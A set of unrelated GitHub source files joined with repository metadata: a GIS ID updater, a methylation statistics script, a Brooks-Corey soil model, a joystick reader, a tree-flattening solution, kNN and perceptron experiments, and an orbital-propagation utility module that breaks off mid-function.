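# equivalent to fixed-width zero padding for counters up to 9999, e.g.
#   newVal = row[0] + str(cpt).zfill(4)   # str(7).zfill(4) -> "0007"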
update_IDSupport(r'F:/Douala/Data_gathering/Gathring.gdb/Supports', "ID_Support like '8221307%'")
##print("Starting the sort")
##arcpy.Sort_management("BT_Model_Project/Supports", "Supports_Sort", [["Date_Visite", "ASCENDING"]])
##print("Sort finished")
|
Diffouo/Python-Data-Analysis
|
Update_IDSupport.py
|
Update_IDSupport.py
|
py
| 1,402 |
python
|
en
|
code
| 1 |
github-code
|
6
|
9470821711
|
#! /usr/bin/python3
import re
total_c_in_C_count = 0
total_1_c_in_C_count = 0
total_c_in_gene = 0
total_1_c_in_gene = 0
total_c_in_intergenic = 0
total_c_in_exon = 0
total_c_in_intron = 0
total_c_in_UTR = 0
total_meth_count = 0
gene_meth_count = 0
intergenic_meth_count = 0
exon_meth_count = 0
intron_meth_count = 0
UTR_meth_count = 0
ambig_meth_count = 0
matched_genes = set()
matched_genes_1 = set()
matched_genes_6 = set()
with open('/path/to/dir/C_all_contexts_methylation_counts_ambig.txt', 'r') as inp:
for rawline in inp:
if rawline[0] not in ('#','\n'):
line = rawline.strip().split('\t')
scaff = line[0]
position = int(line[1])
meth_perc = float(line[2])
reads_meth = int(line[3])
reads_unmeth = int(line[4])
if len(line) > 5:
annot = line[5]
else:
annot = ''
if len(line) > 6:
gid = str(line[6])
else:
gid = ''
if (reads_meth + reads_unmeth) >= 1:
matched_genes_1.add(gid)
total_1_c_in_C_count += 1
if re.search('mRNA', annot):
total_1_c_in_gene += 1
if (reads_meth + reads_unmeth) >= 6:
matched_genes_6.add(gid)
if (reads_meth + reads_unmeth) >= 10:
matched_genes.add(gid)
total_c_in_C_count += 1
if re.search('mRNA', annot):
total_c_in_gene += 1
if re.search('CDS', annot):
total_c_in_exon += 1
elif re.search('intron', annot):
total_c_in_intron += 1
elif re.search('UTR', annot):
total_c_in_UTR += 1
else:
total_c_in_intergenic += 1
if (reads_meth + reads_unmeth) >= 10 and meth_perc >= 10.0 and reads_meth >= 5:
if re.search('mRNA', annot):
gene_meth_count += 1
total_meth_count += 1
if re.search('CDS', annot):
exon_meth_count += 1
elif re.search('intron', annot):
intron_meth_count += 1
elif re.search('UTR', annot):
UTR_meth_count += 1
elif re.search('ambiguous', annot):
ambig_meth_count += 1
else:
intergenic_meth_count += 1
total_meth_count += 1
matched_genes.discard('')  # discard() avoids a KeyError when no empty gene id was collected
overall_meth_perc = float(float(total_meth_count)/float(total_c_in_C_count))*100
cpg_in_gene_meth_perc = float(float(gene_meth_count)/float(total_c_in_gene))*100
cpg_in_intergene_meth_perc = float(float(intergenic_meth_count)/float(total_c_in_intergenic))*100
gene_meth_perc = float(float(gene_meth_count)/float(total_meth_count))*100
intergene_meth_perc = float(float(intergenic_meth_count)/float(total_meth_count))*100
cpg_in_exon_perc = float(float(exon_meth_count)/float(total_c_in_exon))*100
cpg_in_intron_perc = float(float(intron_meth_count)/float(total_c_in_intron))*100
cpg_in_utr_perc = float(float(UTR_meth_count)/float(total_c_in_UTR))*100
exon_meth_perc = float(float(exon_meth_count)/float(gene_meth_count))*100
intron_meth_perc = float(float(intron_meth_count)/float(gene_meth_count))*100
utr_meth_perc = float(float(UTR_meth_count)/float(gene_meth_count))*100
ambig_meth_perc = float(float(ambig_meth_count)/float(total_c_in_C_count))*100
print('Total mapped genes (>= 10 reads): ', len(matched_genes))
print('Total mapped genes (>= 1 read): ', len(matched_genes_1))
print('Total mapped genes (>= 6 reads): ', len(matched_genes_6))
print('Total mapped Cs over genome with read coverage >= 10: ', total_c_in_C_count)
print('Total mapped Cs in genes with read coverage >= 10: ', total_c_in_gene)
print('Total mapped Cs in genes with read coverage >= 1: ', total_1_c_in_gene)
print('Total mapped Cs in intergenic regions with read coverage >= 10: ', total_c_in_intergenic)
print('Methylated Cs (of total CpGs): ', round(overall_meth_perc, 2), '%\n')
print('Methylated Cs in genes (of total CpGs in genes): ', round(cpg_in_gene_meth_perc, 2), '%')
print('Methylated Cs in intergenic regions (of total CpGs in intergenic regions): ', round(cpg_in_intergene_meth_perc, 2), '%\n')
print('Methylated Cs in genes (of total CpGs): ', round(gene_meth_perc, 2), '%')
print('Methylated Cs in intergenic regions (of total CpGs): ', round(intergene_meth_perc, 2), '%\n')
print('Methylated Cs in exons (of total CpGs in exons): ', round(cpg_in_exon_perc, 2), '%')
print('Methylated Cs in introns (of total CpGs in introns): ', round(cpg_in_intron_perc, 2), '%')
print('Methylated Cs in UTRs (of total CpGs in UTRs): ', round(cpg_in_utr_perc, 2), '%\n')
print('Methylated Cs in exons (of total methylated CpGs in genes): ', round(exon_meth_perc, 2), '%')
print('Methylated Cs in introns (of total methylated CpGs in genes): ', round(intron_meth_perc, 2), '%')
print('Methylated Cs in UTRs (of total methylated CpGs in genes): ', round(utr_meth_perc, 2), '%\n')
print('Methylated Cs with ambiguous annotation (of total CpGs): ', round(ambig_meth_perc, 2), '%')
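# Input format assumed by the parser above (tab-separated, one cytosine per line;
# the last two columns are optional):
#   scaffold  position  meth_percent  reads_methylated  reads_unmethylated  [annotation]  [gene_id]
# Lines starting with '#' and empty lines are skipped.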
|
MCH74/Mnat_Methylation
|
scripts/analyse_all_C_methcalls.py
|
analyse_all_C_methcalls.py
|
py
| 5,327 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43085015911
|
import numpy as np
class BrooksCorey(object):
def __init__( self, lambd=0., alpha=0., sr=0.0, smoothing_interval=0. ):
self._lambda = lambd
self._alpha = alpha
self._sr = sr
self._pc0 = smoothing_interval
        self._factor = -2.0 - (0.5 + 2.0) * self._lambda
self._pc_bubble = 1.0 / self._alpha
if self._pc0 > 0.:
k0 = self.k_relative(self._pc0) - 1.
k0p = self.d_k_relative(self._pc0)
self._a = (3 * k0 - k0p * self._pc0) / (self._pc0**2)
self._b = (k0p * self._pc0 - 2 * k0) / (self._pc0**3)
def capillaryPressure( self, s ):
se = (s - self._sr) / (1.0 - self._sr)
        se = min(se, 1.0)
return pow(se, -1.0/self._lambda) / self._alpha
def d_capillaryPressure( self, s ):
se = (s - self._sr) / (1.0 - self._sr)
        se = min(se, 1.0)
        return -1. / self._lambda * pow(se, -1.0/self._lambda - 1.) / self._alpha / (1. - self._sr)
def saturation( self, pc ):
if pc > self._pc_bubble:
return pow(self._alpha * pc, -self._lambda) * (1.0 - self._sr) + self._sr
else:
            return 1.0
def d_saturation( self, pc ):
if pc > self._pc_bubble:
return -pow(self._alpha * pc, -self._lambda - 1.0) * (1.0 - self._sr) * self._alpha * self._lambda
else:
return 0.
def k_relative( self, pc ):
if pc <= self._pc_bubble:
return 1.0
elif pc >= self._pc0:
return pow(self._alpha * pc, self._factor)
else:
dpc = pc - self._pc_bubble
return 1.0 + self._a * dpc**2 + self._b * dpc**3
def d_k_relative( self, pc ):
if pc <= self._pc_bubble:
return 0.
elif pc >= self._pc0:
return self._factor * self._alpha * pow(self._alpha * pc, self._factor - 1.0)
else:
dpc = pc - self._pc_bubble
return self._a * 2 * dpc + self._b * 3 * dpc**2
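# A minimal usage sketch (the parameter values below are illustrative
# assumptions, not taken from any ATS input deck): build a Brooks-Corey curve,
# map a saturation to capillary pressure and back, and evaluate the relative
# permeability at that pressure.
if __name__ == "__main__":
    wrm = BrooksCorey(lambd=0.3, alpha=5.0e-4, sr=0.1, smoothing_interval=0.)
    pc = wrm.capillaryPressure(0.5)            # capillary pressure at s = 0.5
    print("pc(s=0.5) =", pc)
    print("s(pc)     =", wrm.saturation(pc))   # round-trips back to ~0.5
    print("k_rel(pc) =", wrm.k_relative(pc))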
|
amanzi/ats
|
tools/python_models/wrm_brookscorey.py
|
wrm_brookscorey.py
|
py
| 2,012 |
python
|
en
|
code
| 35 |
github-code
|
6
|
24860820161
|
# -*- coding: utf-8 -*-
"""
Mini project 1
Dennis Brown, COMP6636, 03 MAR 2021
"""
import numpy as np
import copy
import matplotlib.pyplot as plt
def libsvm_scale_import(filename):
"""
Read data from a libsvm .scale file
"""
datafile = open(filename, 'r')
# First pass: get dimensions of data
num_samples = 0
max_feature_id = 0
for line in datafile:
num_samples += 1
tokens = line.split()
for feature in tokens[1:]:
feature_id = int(feature.split(':')[0])
max_feature_id = max(feature_id, max_feature_id)
# Second pass: read data into array
data = np.zeros((num_samples, max_feature_id + 1))
curr_sample = 0
datafile.seek(0)
for line in datafile:
tokens = line.split()
data[curr_sample][0] = float(tokens[0])
for feature in tokens[1:]:
feature_id = int(feature.split(':')[0])
feature_val = float(feature.split(':')[1])
data[curr_sample][feature_id] = feature_val
curr_sample += 1
datafile.close()
print('LOADED:', filename, ':', data.shape)
return data
def get_neighbors(data, test_sample, num_neighbors):
"""
Given training data, a test sample, and a number of
neighbors, return the closest neighbors.
"""
# Calculate all distances from the training samples
# to this test sample. Collect index, distance into a list.
indices_and_distances = list()
for i in range(len(data)):
dist = np.linalg.norm(test_sample[1:] - (data[i])[1:]) # leave out classification at pos 0
indices_and_distances.append([i, dist])
# Sort list by distance
indices_and_distances.sort(key=lambda _: _[1])
# Make a list of requested number of closest neighbors from sorted
# list of indices+distances
neighbors = list()
for i in range(num_neighbors):
neighbors.append(indices_and_distances[i][0])
return neighbors
def classify_one_sample(data, test_sample, num_neighbors):
"""
Given training data, a test sample, and a number of neighbors,
predict which classification the test sample belongs to.
"""
# Get closest neighbors
neighbors = get_neighbors(data, test_sample, num_neighbors)
# Create list of classifications of the neighbors
classifications = list()
for i in range(len(neighbors)):
classifications.append(data[neighbors[i]][0]) # 0 = classification
# Return the most common classification of the neighbors
prediction = max(set(classifications), key = classifications.count)
return prediction
def k_nearest_neighbors(data, test_samples, num_neighbors):
"""
Given sample data (samples are rows, columns
features, and samples have classifications in position 0),
test data, and a number of neighbors, predict which classification
each test sample belongs to.
"""
classifications = list()
for i in range(len(test_samples)):
output = classify_one_sample(data, test_samples[i], num_neighbors)
classifications.append(output)
if ((i % 20) == 0):
print('\rknn test sample', i, end='')
print()
return(classifications)
def check_knn_classifications(y, y_hat):
"""
Given actual values y and classiciations y_hat,
return the number of errors
"""
errors = 0
for i in range(len(y)):
if (y[i] != y_hat[i]):
errors += 1
return errors
def train_perceptron(data, beta, step_limit):
"""
Perceptron. Given a set of data (samples are rows, columns
features, and samples have classifications in position 0),
a step size (beta), and a step limit, train and return a
weight vector that can be used to classify the given data.
"""
# Initialize the weight vector including bias element
w = np.zeros(len(data[0]))
# Initialize y_hat
y_hat = np.zeros(len(data))
# Slice off y
y = data[:,0]
# Repeat the main loop until we have convergence or reach the
# iteration limit
steps = 0
converged = False
while(not(converged) and (steps < step_limit)):
converged = True
# For each sample in the data, calculate w's classification error
# and update w.
for i in range(len(data)):
# Replace classification in sample[0] with a 1 to allow
# for a biased weight vector
biased_sample = np.copy(data[i])
biased_sample[0] = 1
# Get prediction and error, then update weight vector
y_hat[i] = 1 if (np.matmul(w.T, biased_sample) > 0) else -1
error = y[i] - y_hat[i]
w += biased_sample * error * beta
steps += 1
# If error on this element is > a very small value, we have
# not converged.
if (abs(error) > 0.000001):
converged = False
print('Perceptron:' ,steps, 'steps; converged?', converged)
return w
def multiclass_train_perceptron(data, beta, step_limit):
"""
Perceptron. Given a set of data (samples are rows, columns
features, and samples have classifications in position 0),
a step size (beta), and a step limit, train and return a
weight vector that can be used to classify the given data.
This version works on data with multiple classes by one-vs-rest.
"""
# Find unique classes
classes = []
for i in range(data.shape[0]):
if (not(data[i][0] in classes)):
classes.append(data[i][0])
# For each classification, train perceptron on current class vs.
# rest of the untrained classes.
ws = []
curr_data = copy.deepcopy(data)
for curr_class in range(len(classes)):
# Save original classification data
orig_classes = copy.deepcopy(curr_data[:,0])
# Reset classification data to 1 (for current class) or -1 for other
for i in range(curr_data.shape[0]):
if (curr_data[i][0] == classes[curr_class]):
curr_data[i][0] = 1
else:
curr_data[i][0] = -1
# Train and find weights
ws.append(train_perceptron(curr_data, beta, step_limit))
# Put original classifications back
for i in range(curr_data.shape[0]):
curr_data[i][0] = orig_classes[i]
return ws
def test_perceptron(data, w):
"""
    Given test data and a weight vector w, return the number of
    misclassifications made when classifying the test data using the
    weights.
"""
errors = 0
# Initialize y_hat
y_hat = np.zeros(len(data))
# Slice off y
y = data[:,0]
    # Determine how the weights classify each test sample and count
    # the misclassifications
for i in range(len(data)):
biased_sample = np.copy(data[i])
biased_sample[0] = 1
y_hat[i] = 1 if (np.matmul(w.T, biased_sample) > 0) else -1
if (y[i] != y_hat[i]):
errors += 1
return errors
def multiclass_test_perceptron(data, ws):
"""
    Given test data and a list of per-class weight vectors ws, return the
    number of misclassifications for each class when classifying the test
    data using those weights.
This version works on data with multiple classes by One vs. All (OVA).
"""
# Find unique classes
classes = []
for i in range(data.shape[0]):
if (not(data[i][0] in classes)):
classes.append(data[i][0])
# For each classification, test perceptron on current class vs.
# rest of the untested classes.
errors = []
curr_data = copy.deepcopy(data)
for curr_class in range(len(classes)):
# Save original classification data
orig_classes = copy.deepcopy(curr_data[:,0])
# Reset classification data to 1 (for current class) or -1 for other
for i in range(curr_data.shape[0]):
if (curr_data[i][0] == classes[curr_class]):
curr_data[i][0] = 1
else:
curr_data[i][0] = -1
        # Test using the weights trained for this class
errors.append(test_perceptron(curr_data, ws[curr_class]))
# Put original classifications back
for i in range(curr_data.shape[0]):
curr_data[i][0] = orig_classes[i]
return errors
def iris_knn():
"""
Run kNN on the iris dataset for the various numbers of neighbors.
"""
print("----------\niris kNN")
# Load data
data = libsvm_scale_import('data/iris.scale')
# Shuffle the data because we want to split it into train & test,
# and it is pre-sorted (we would test against classes we didn't
# see in training)
np.random.seed(1) # ensure consistent shuffling
np.random.shuffle(data)
# Split up data into training and test data based on split value
split = 50
train_data = data[:split]
test_data = data[split:]
# Test multiple values of k
test_ks = np.arange(1, split)
error_rates = np.zeros(test_ks.shape[0])
for i in range(len(test_ks)):
# Classify the test data
print('Classify with k =', test_ks[i])
classifications = k_nearest_neighbors(train_data, test_data,
test_ks[i])
# Check accuracy
errors = check_knn_classifications(test_data[:,0], classifications)
error_rates[i] = errors / test_data.shape[0]
print(errors, 'errors in', test_data.shape[0], 'samples')
print('ks:', test_ks)
print('error rates:', error_rates)
plt.clf()
plt.plot(test_ks, error_rates, marker='.')
plt.title('Iris kNN: error rate vs. k')
plt.xlabel('k')
plt.ylabel('error rate')
plt.xlim(left = 0)
plt.ylim(bottom = 0)
plt.grid(True)
plt.savefig('iris_knn.png', dpi = 600)
def iris_perceptron():
"""
Run Perceptron on the iris dataset in various ways.
"""
print("----------\niris Perceptron")
# Load data
data = libsvm_scale_import('data/iris.scale')
# Shuffle the data because we want to split it into train & test,
# and it is pre-sorted (we would test against classes we didn't
# see in training)
np.random.seed(1) # ensure consistent shuffling
np.random.shuffle(data)
# Split up data into training and test data based on split value
split = 50
train_data = data[:split]
test_data = data[split:]
# Perform multi-class training and test and collect
# a weight vector and number of errors for each class
ws = multiclass_train_perceptron(train_data, 0.1, 100000)
errors = multiclass_test_perceptron(test_data, ws)
# Report errors
print(errors, 'errors in', test_data.shape[0], 'samples')
# Show sorted weights for every class
for i in range(len(ws)):
# Sort weights to find most important
w = list(ws[i][1:])
feature_ids = range(1, len(w) + 1)
print('W:', w)
labels = []
for id in feature_ids:
labels.append(str(int(id)))
# Report top weights
plt.clf()
plt.bar(labels, w)
plt.title('iris Perceptron: feature weights for class = ' + str(i+1))
plt.xlabel('feature ID')
plt.ylabel('weight')
plt.grid(True)
plt.savefig('iris_weights' + str(i+1) + '.png', dpi = 600)
def a4a_knn():
"""
Run kNN on the a4a dataset for various numbers of neighbors.
"""
print("----------\na4a kNN")
# Load data
train_data = libsvm_scale_import('data/a4a')
test_data = libsvm_scale_import('data/a4a.t')
# Training data has 1 fewer feature than test data, so add a column
# of zeros to it so samples have same number of features in train and test
zero_col = np.zeros((len(train_data), 1))
train_data = np.hstack((train_data, zero_col))
# Test multiple values of k
# This takes over 3 hours to run on my fastest computer.
test_ks = np.array([1, 3, 5, 11, 21, 31, 41, 51, 61, 71, 81, 91, 101, 201, 301, 401, 501, 601, 701, 801, 901, 1001])
error_rates = np.zeros(len(test_ks))
for i in range(len(test_ks)):
print('Classify with k =', test_ks[i])
# Classify the test data
classifications = k_nearest_neighbors(train_data, test_data,
test_ks[i])
# Check accuracy
errors = check_knn_classifications(test_data[:,0], classifications)
error_rates[i] = errors / test_data.shape[0]
print(errors, 'errors in', test_data.shape[0], 'samples')
print('ks:', test_ks)
print('error rates:', error_rates)
plt.clf()
plt.plot(test_ks, error_rates, marker='.')
plt.title('a4a kNN: error rate vs. k')
plt.xlabel('k')
plt.ylabel('error rate')
plt.xlim(left = 0)
plt.ylim(bottom = 0)
plt.grid(True)
plt.savefig('a4a_knn.png', dpi = 600)
def a4a_perceptron():
"""
Run Perceptron on the a4a dataset in various ways.
"""
print("----------\na4a Perceptron")
# Load data
train_data = libsvm_scale_import('data/a4a')
test_data = libsvm_scale_import('data/a4a.t')
# Training data has 1 fewer feature than test data, so add a column
# of zeros to it so samples have same number of features in train and test
zero_col = np.zeros((len(train_data), 1))
train_data = np.hstack((train_data, zero_col))
# Test multiple values of beta
test_betas = np.array([0.0001, 0.001, 0.01, 0.1, 1.0, 10.0, 100.0])
error_rates = np.zeros(test_betas.shape[0])
ws = []
best_beta = -1
best_error_rate = 999999
for i in range(len(test_betas)):
print('Classify with beta =', test_betas[i])
# Train and find weights
ws.append(train_perceptron(train_data, test_betas[i], 100000))
# Check accuracy
errors = test_perceptron(test_data, ws[i])
error_rates[i] = errors / test_data.shape[0]
if (error_rates[i] < best_error_rate):
best_error_rate = error_rates[i]
best_beta = i
print(errors, 'errors in', test_data.shape[0], 'samples')
# Report error rates
print('betas:', test_betas)
print('error rates:', error_rates)
plt.clf()
plt.plot(test_betas, error_rates, marker='.')
plt.title('a4a Perceptron: error rate vs. step size for 100000 iterations')
plt.xscale('log')
plt.xlabel('step size')
plt.ylabel('error rate')
plt.ylim(bottom = 0)
plt.grid(True)
plt.savefig('a4a_perceptron.png', dpi = 600)
# Sort weights to find most important
w = list(ws[best_beta][1:])
feature_ids = range(1, len(w) + 1)
bar_data = list(zip(feature_ids, w))
bar_data.sort(key = lambda _: abs(_[1]), reverse = True)
bar_data = np.array(bar_data[:20])
labels = []
for id in bar_data[:,0]:
labels.append(str(int(id)))
# Report top weights
plt.clf()
plt.bar(labels, bar_data[:,1])
plt.title('a4a Perceptron: 20 most important features')
plt.xlabel('feature ID')
plt.ylabel('weight')
plt.grid(True)
plt.savefig('a4a_weights.png', dpi = 600)
def main():
iris_knn()
iris_perceptron()
a4a_knn()
a4a_perceptron()
if __name__ == '__main__':
main()
|
dennisgbrown/classifiers-decision-trees-kNN-perceptron
|
MiniProj1.py
|
MiniProj1.py
|
py
| 15,120 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41137173523
|
#to run, 'sudo python' then 'import gamepad' (this file), then 'gamepad.test()'
#to install pygame: apt-get install python-pygame
import pygame, time, serial, csv, motor_func, math
pygame.init()
j = pygame.joystick.Joystick(0)
j.init()
# This is for the output write (change it accordingly, i.e: /dev/ttyUSB0):
#output_ser_path = raw_input("Please enter your serial port number: ")
output_delay = 0.1
"""
for i in range(10):
try:
output_ser_path = str(i)
except Exception:
pass
print(output_ser_path)
ser = serial.Serial("Port_#0002.Hub_#0004")
ser.baudrate = 9600
ser.write('Initialized Joystick : %s' % j.get_name())
print('Initialized Joystick : %s' % j.get_name())
ser.timeout = 1
"""
def get():
out = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
it = 0 #iterator
pygame.event.pump()
#Read input from the two joysticks
for i in range(0, j.get_numaxes()):
out[it] = round(j.get_axis(i), 2)
it+=1
#Read input from buttons
for i in range(0, j.get_numbuttons()):
#print (j.get_numbuttons())
out[it] = j.get_button(i)
it+=1
    # Read input from hats as well. (An early "return out" used to sit here,
    # which made this loop unreachable.)
    for i in range(0, j.get_numhats()):
        out[it] = j.get_hat(i)
        it+=1
    return out
def test():
while True:
time.sleep(float(output_delay))
joystick_info = get()
print (joystick_info)
#ser.write(str(joystick_info))
#def motor_move(motor, speed_fb,speed_lr,ser)
# motor_func.motor_move(1,joystick_info[1]*0.5*(joystick_info[3] + 1),joystick_info[0]*0.5*(joystick_info[3] + 1),joystick_info[2]*0.5*(joystick_info[3] + 1),ser)
# motor_func.motor_move(2,joystick_info[1]*0.5*(joystick_info[3] + 1),joystick_info[0]*0.5*(joystick_info[3] + 1),joystick_info[2]*0.5*(joystick_info[3] + 1),ser)
if __name__ == '__main__':
test()
|
rsx-utoronto/galaxy
|
ground_station/main_ui/joystick.py
|
joystick.py
|
py
| 1,815 |
python
|
en
|
code
| 1 |
github-code
|
6
|
2772802336
|
# Given a binary tree, flatten it to a linked list in-place.
# For example, given the following tree:
# 1
# / \
# 2 5
# / \ \
# 3 4 6
# The flattened tree should look like:
# 1
# \
# 2
# \
# 3
# \
# 4
# \
# 5
# \
# 6
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def flatten(self, root: TreeNode) -> None:
"""
Do not return anything, modify root in-place instead.
"""
#http://www.cnblogs.com/grandyang/p/4293853.html
        # The idea: use DFS to reach the leftmost subtree first, then go back to
        # its parent, detach the parent from its right child, move the original
        # left subtree to the parent's right side, append the original right
        # subtree to the tail of the new right spine, and repeat the same
        # operation at each parent above.
if root == None:
return
if root.left!=None:
self.flatten(root.left)
if root.right!=None:
self.flatten(root.right)
temp = root.right
root.right = root.left
root.left = None
while(root.right!=None):
root = root.right
root.right = temp
def flatten1(self,root)->None:
        # Iterative (non-recursive) version
cur = root
while(cur!=None):
if cur.left:
p = cur.left
while(p.right):
p = p.right
p.right = cur.right
cur.right = cur.left
cur.left = None
cur = cur.right
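# A minimal usage sketch (not part of the original solution): build the example
# tree from the problem statement, flatten it in place, and walk the right spine.
if __name__ == "__main__":
    root = TreeNode(1)
    root.left = TreeNode(2)
    root.right = TreeNode(5)
    root.left.left = TreeNode(3)
    root.left.right = TreeNode(4)
    root.right.right = TreeNode(6)
    Solution().flatten(root)
    node = root
    while node:
        print(node.val, end=" ")  # expected output: 1 2 3 4 5 6
        node = node.right
    print()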
|
queryor/algorithms
|
leetcode/114. Flatten Binary Tree to Linked List.py
|
114. Flatten Binary Tree to Linked List.py
|
py
| 1,688 |
python
|
en
|
code
| 0 |
github-code
|
6
|
777182916
|
import datetime
import numpy as np
import torch
def get_gravity_constants(gravity_constant_name):
if gravity_constant_name == 'wgs-72old':
mu = 398600.79964 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 0.0743669161
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name == 'wgs-72':
mu = 398600.8 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name=="wgs-84":
mu = 398600.5 # in km3 / s2
radiusearthkm = 6378.137 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.00108262998905
j3 = -0.00000253215306
j4 = -0.00000161098761
j3oj2 = j3 / j2
else:
raise RuntimeError("Supported gravity constant names: wgs-72, wgs-84, wgs-72old while "+gravity_constant_name+" was provided")
return torch.tensor(tumin), torch.tensor(mu), torch.tensor(radiusearthkm), torch.tensor(xke), torch.tensor(j2), torch.tensor(j3), torch.tensor(j4), torch.tensor(j3oj2)
def propagate(x, tle_sat, tsince, gravity_constant_name="wgs-84"):
"""
This function takes a tensor of inputs and a TLE, and returns the corresponding state.
It can be used to take the gradient of the state w.r.t. the inputs.
Args:
- x (``torch.tensor``): input of tensors, with the following values (x[0:9] have the same units as the ones in the TLE):
- x[0]: bstar
- x[1]: ndot
- x[2]: nddot
- x[3]: ecco
- x[4]: argpo
- x[5]: inclo
- x[6]: mo
- x[7]: kozai
- x[8]: nodeo
- tle_sat (``dsgp4.tle.TLE``): TLE object to be propagated
- tsince (``float``): propagation time in minutes
Returns:
- state (``torch.tensor``): (2x3) tensor representing position and velocity in km and km/s.
"""
from .sgp4init import sgp4init
from .sgp4 import sgp4
whichconst=get_gravity_constants(gravity_constant_name)
sgp4init(whichconst=whichconst,
opsmode='i',
satn=tle_sat.satellite_catalog_number,
epoch=(tle_sat._jdsatepoch+tle_sat._jdsatepochF)-2433281.5,
xbstar=x[0],
xndot=x[1],
xnddot=x[2],
xecco=x[3],
xargpo=x[4],
xinclo=x[5],
xmo=x[6],
xno_kozai=x[7],
xnodeo=x[8],
satellite=tle_sat)
state=sgp4(tle_sat, tsince*torch.ones(1,1))
return state
def from_year_day_to_date(y,d):
return (datetime.datetime(y, 1, 1) + datetime.timedelta(d - 1))
def gstime(jdut1):
deg2rad=np.pi/180.
tut1 = (jdut1 - 2451545.0) / 36525.0
temp = -6.2e-6* tut1 * tut1 * tut1 + 0.093104 * tut1 * tut1 + \
(876600.0*3600 + 8640184.812866) * tut1 + 67310.54841 # sec
temp = (temp*(np.pi/180.0) / 240.0) % (2*np.pi) # 360/86400 = 1/240, to deg, to rad
# ------------------------ check quadrants ---------------------
temp=torch.where(temp<0., temp+(2*np.pi), temp)
return temp
def clone_w_grad(y):
return y.clone().detach().requires_grad_(True)
def jday(year, mon, day, hr, minute, sec):
"""
Converts a date and time to a Julian Date. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
year (`int`): year
mon (`int`): month
day (`int`): day
hr (`int`): hour
minute (`int`): minute
sec (`float`): second
Returns:
`float`: Julian Date
"""
jd=(367.0 * year -
7.0 * (year + ((mon + 9.0) // 12.0)) * 0.25 // 1.0 +
275.0 * mon // 9.0 +
day + 1721013.5)
fr=(sec + minute * 60.0 + hr * 3600.0) / 86400.0
return jd,fr
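# Worked example: jday(2000, 1, 1, 12, 0, 0.0) returns (2451544.5, 0.5), and
# their sum, 2451545.0, is the Julian Date of the J2000 epoch
# (2000-01-01 12:00:00).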
def invjday(jd):
"""
Converts a Julian Date to a date and time. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
jd (`float`): Julian Date
Returns:
`tuple`: (year, month, day, hour, minute, second)
"""
temp = jd - 2415019.5
tu = temp / 365.25
year = 1900 + int(tu // 1.0)
leapyrs = int(((year - 1901) * 0.25) // 1.0)
days = temp - ((year - 1900) * 365.0 + leapyrs) + 0.00000000001
if (days < 1.0):
year = year - 1
leapyrs = int(((year - 1901) * 0.25) // 1.0)
days = temp - ((year - 1900) * 365.0 + leapyrs)
mon, day, hr, minute, sec = days2mdhms(year, days)
sec = sec - 0.00000086400
return year, mon, day, hr, minute, sec
def days2mdhms(year, fractional_day):
"""
Converts a number of days to months, days, hours, minutes, and seconds.
Args:
year (`int`): year
fractional_day (`float`): number of days
Returns:
`tuple`: (month, day, hour, minute, second)
"""
d=datetime.timedelta(days=fractional_day)
datetime_obj=datetime.datetime(year-1,12,31)+d
return datetime_obj.month, datetime_obj.day, datetime_obj.hour, datetime_obj.minute, datetime_obj.second+datetime_obj.microsecond/1e6
def from_string_to_datetime(string):
"""
Converts a string to a datetime object.
Args:
string (`str`): string to convert
Returns:
`datetime.datetime`: datetime object
"""
if string.find('.')!=-1:
return datetime.datetime.strptime(string, '%Y-%m-%d %H:%M:%S.%f')
else:
return datetime.datetime.strptime(string, '%Y-%m-%d %H:%M:%S')
def from_mjd_to_epoch_days_after_1_jan(mjd_date):
"""
Converts a Modified Julian Date to the number of days after 1 Jan 2000.
Args:
mjd_date (`float`): Modified Julian Date
Returns:
`float`: number of days after 1 Jan 2000
"""
d = from_mjd_to_datetime(mjd_date)
dd = d - datetime.datetime(d.year-1, 12, 31)
days = dd.days
days_fraction = (dd.seconds + dd.microseconds/1e6) / (60*60*24)
return days + days_fraction
def from_mjd_to_datetime(mjd_date):
"""
Converts a Modified Julian Date to a datetime object. The Modified Julian Date is the number of days since midnight on November 17, 1858.
Args:
mjd_date (`float`): Modified Julian Date
Returns:
`datetime.datetime`: datetime object
"""
jd_date=mjd_date+2400000.5
return from_jd_to_datetime(jd_date)
def from_jd_to_datetime(jd_date):
"""
Converts a Julian Date to a datetime object. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
jd_date (`float`): Julian Date
Returns:
`datetime.datetime`: datetime object
"""
year, month, day, hour, minute, seconds=invjday(jd_date)
e_1=datetime.datetime(year=int(year), month=int(month), day=int(day), hour=int(hour), minute=int(minute), second=0)
return e_1+datetime.timedelta(seconds=seconds)
def get_non_empty_lines(lines):
"""
This function returns the non-empty lines of a list of lines.
Args:
lines (`list`): list of lines
Returns:
`list`: non-empty lines
"""
if not isinstance(lines, str):
raise ValueError('Expecting a string')
lines = lines.splitlines()
lines = [line for line in lines if line.strip()]
return lines
def from_datetime_to_fractional_day(datetime_object):
"""
Converts a datetime object to a fractional day. The fractional day is the number of days since the beginning of the year. For example, January 1st is 0.0, January 2nd is 1.0, etc.
Args:
datetime_object (`datetime.datetime`): datetime object to convert
Returns:
`float`: fractional day
"""
d = datetime_object-datetime.datetime(datetime_object.year-1, 12, 31)
fractional_day = d.days + d.seconds/60./60./24 + d.microseconds/60./60./24./1e6
return fractional_day
def from_datetime_to_mjd(datetime_obj):
"""
Converts a datetime object to a Modified Julian Date. The Modified Julian Date is the number of days since midnight on November 17, 1858.
Args:
datetime_obj (`datetime.datetime`): datetime object to convert
Returns:
`float`: Modified Julian Date
"""
return from_datetime_to_jd(datetime_obj)-2400000.5
def from_datetime_to_jd(datetime_obj):
"""
